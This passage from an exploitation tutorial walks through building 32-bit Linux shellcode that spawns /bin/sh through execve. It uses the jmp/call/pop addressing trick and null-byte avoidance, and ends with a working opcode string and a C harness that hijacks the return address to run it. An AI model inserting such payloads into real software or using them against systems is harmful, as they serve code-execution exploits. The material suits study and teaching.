Now it's time to write a shellcode to do something a little more useful. For instance, we can write a shellcode to spawn a shell (/bin/sh) and eventually exit cleanly. The simplest way to spawn a shell is using the execve(2) syscall. Let's take a look at its usage from its man page:
    EXECVE(2)              Linux Programmer's Manual              EXECVE(2)

    NAME
           execve - execute program

    SYNOPSIS
           #include <unistd.h>

           int execve(const char *filename, char *const argv [],
                      char *const envp[]);

    DESCRIPTION
           execve() executes the program pointed to by filename. filename
           must be either a binary executable, or a script starting with a
           line of the form "#! interpreter [arg]". In the latter case, the
           interpreter must be a valid pathname for an executable which is
           not itself a script, which will be invoked as interpreter [arg]
           filename.

           argv is an array of argument strings passed to the new program.
           envp is an array of strings, conventionally of the form
           key=value, which are passed as environment to the new program.
           Both, argv and envp must be terminated by a null pointer. The
           argument vector and environment can be accessed by the called
           program's main function, when it is defined as int main(int
           argc, char *argv[], char *envp[]).

           [...]

To recap, we need to pass it three arguments:
- a pointer to the name of the program to execute (filename);
- a pointer to the array of argument strings (argv), terminated by a null pointer;
- a pointer to the array of environment strings (envp), also terminated by a null pointer.
Therefore, spawning a shell from a C program looks like:
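    #include <unistd.h>

    int main()
    {
        char *args[2];

        args[0] = "/bin/sh";
        args[1] = NULL;
        execve(args[0], args, NULL);
    }

In the above example we passed to execve(2):
- a pointer to the string "/bin/sh" as the program to execute;
- an array of two pointers as argv: the first points to "/bin/sh", the second is NULL;
- a NULL pointer as envp.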
Now let's build it and see it work:
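    $ gcc -o get_shell get_shell.c
    $ ./get_shell
    sh-2.05b$ exit
    $

OK, we got our shell! Now let's see how to use this system call in assembler (since there are only three arguments, we can pass them in registers). We immediately have to tackle two problems:
- the string "/bin/sh" and the argv array must both be null-terminated, but the shellcode itself should not contain null bytes;
- we need the address of the string in memory, but we cannot know in advance where the shellcode will be loaded.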
To solve the first problem, we will make our shellcode able to put the null bytes in the right places at run-time. To solve the second problem, instead, we will use relative memory addressing.
The "classic" method to retrieve the address of the shellcode is to begin with a CALL instruction. The first thing a CALL instruction does is push the address of the byte that follows it onto the stack (so that the RET instruction can load this address into EIP upon return from the called function); execution then jumps to the address specified by the operand of the CALL instruction. This gives us our starting point: the address of the first byte after the CALL is the last value on the stack, and we can easily retrieve it with a POP instruction! Therefore, the overall structure of the shellcode will be:
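    jmp short mycall      ; Immediately jump to the call instruction

    shellcode:
        pop esi           ; Store the address of "/bin/sh" in ESI
        [...]

    mycall:
        call shellcode    ; Push the address of the next byte onto the stack: the next
        db "/bin/sh"      ; byte is the beginning of the string "/bin/sh"

Let's see what it does:
1. The JMP at the beginning transfers execution to the mycall label, i.e. to the CALL instruction.
2. The CALL pushes the address of the byte that follows it, which is the first byte of the string "/bin/sh", onto the stack and jumps back to the shellcode label.
3. The POP stores that address in ESI; from now on, every address we need can be expressed as an offset from ESI.

Now we can fill the structure of the shellcode with something useful. Let's see, step by step, what it will have to do:
1. Zero out EAX, so that we have a null value available without embedding null bytes in the code.
2. Terminate the string "/bin/sh" by writing a null byte right after it, at [ESI+7].
3. Build the argument array after the string: the address of the string at [ESI+8] and a NULL pointer at [ESI+12].
4. Store the number of the execve(2) syscall (11) in EAX.
5. Load the three arguments into EBX, ECX and EDX.
6. Execute the system call with int 0x80.

This is the resulting assembly code: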
    jmp short mycall               ; Immediately jump to the call instruction

    shellcode:
        pop esi                    ; Store the address of "/bin/sh" in ESI
        xor eax, eax               ; Zero out EAX
        mov byte [esi + 7], al     ; Write the null byte at the end of the string
        mov dword [esi + 8], esi   ; [ESI+8], i.e. the memory immediately after the string
                                   ; "/bin/sh", will contain the array pointed to by the
                                   ; second argument of execve(2); therefore we store in
                                   ; [ESI+8] the address of the string...
        mov dword [esi + 12], eax  ; ...and in [ESI+12] the NULL pointer (EAX is 0)
        mov al, 0xb                ; Store the number of the syscall (11) in EAX
        lea ebx, [esi]             ; Copy the address of the string in EBX
        lea ecx, [esi + 8]         ; Second argument to execve(2)
        lea edx, [esi + 12]        ; Third argument to execve(2) (address of the NULL
                                   ; pointer, i.e. an empty environment array)
        int 0x80                   ; Execute the system call

    mycall:
        call shellcode             ; Push the address of "/bin/sh" onto the stack
        db "/bin/sh"
Now let's extract the opcodes:
    $ nasm -f elf get_shell.asm
    $ objdump -d get_shell.o

    get_shell.o:     file format elf32-i386

    Disassembly of section .text:

    00000000 <shellcode-0x2>:
       0:   eb 18                   jmp    1a <mycall>

    00000002 <shellcode>:
       2:   5e                      pop    %esi
       3:   31 c0                   xor    %eax,%eax
       5:   88 46 07                mov    %al,0x7(%esi)
       8:   89 76 08                mov    %esi,0x8(%esi)
       b:   89 46 0c                mov    %eax,0xc(%esi)
       e:   b0 0b                   mov    $0xb,%al
      10:   8d 1e                   lea    (%esi),%ebx
      12:   8d 4e 08                lea    0x8(%esi),%ecx
      15:   8d 56 0c                lea    0xc(%esi),%edx
      18:   cd 80                   int    $0x80

    0000001a <mycall>:
      1a:   e8 e3 ff ff ff          call   2 <shellcode>
      1f:   2f                      das
      20:   62 69 6e                bound  %ebp,0x6e(%ecx)
      23:   2f                      das
      24:   73 68                   jae    8e <mycall+0x74>
    $
insert them in the C program:
    char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46"
                       "\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
                       "\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

    int main()
    {
        int *ret;

        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
    }
and test it:
    $ gcc -o get_shell get_shell.c
    $ ./get_shell
    sh-2.05b$ exit
    $